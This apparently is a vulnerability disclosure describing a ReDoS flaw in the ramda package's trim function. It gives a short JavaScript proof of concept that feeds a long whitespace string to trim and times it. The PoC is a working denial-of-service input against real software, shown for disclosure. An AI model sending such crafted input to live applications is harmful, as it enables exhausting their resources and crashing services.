✍️ Description

A ReDoS (regular expression denial of service) flaw was found in the ramda package. An attacker that is able to provide crafted input to the trim function may cause an application to consume an excessive amount of CPU.

Similar attack ref: https://nvd.nist.gov/vuln/detail/CVE-2020-7753

🕵️‍♂️ Proof of Concept

Create the following poc.js

// PoC.js
var {trim} = require("ramda");

function build_blank (n) {
var ret = "1"
for (var i = 0; i < n; i++) {
ret += " "
}

return ret + "1";
}

var time = Date.now();
trim(build_blank(50000))
var time_cost = Date.now() - time;
console.log("time_cost: " + time_cost)

Execute the following command in another terminal:

npm i ramda
node poc.js

Check the Output:

time_cost: 2639

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes.